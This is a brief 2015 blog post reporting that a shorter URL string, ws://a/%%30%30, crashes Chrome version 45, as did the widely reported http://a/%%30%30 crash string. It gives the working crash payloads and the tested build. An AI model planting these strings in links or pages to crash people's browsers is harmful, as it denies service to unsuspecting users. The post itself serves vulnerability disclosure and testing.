Wednesday, September 23, 2015

ChromeCrash: It is not 16 characters but 14!

16 characters can crash latest Chrome browser, there are many articles related to this DoS Vulnerability. Most of the articles state minimum required characters to crash is 16 but my tests show that 14 characters can trigger crash.
Those articles point to below URL
http://a/%%30%30

Tested with
ws://a/%%30%30
ws URI handler stands for WebSockets

One of the first bugs in Chrome uses one character (%) to crash, found by one of my friends Rishi Narang.

Tested on
Google Chrome45.0.2454.99 (Official Buildm (32-bit)
Revision8813113675a50e4f7e90fec49a3eb1796454618b-refs/branch-heads/2454@{#492}
OSWindows
List of IANA recognized URI Handlers can be found at
http://www.iana.org/assignments/uri-schemes/uri-schemes.xhtml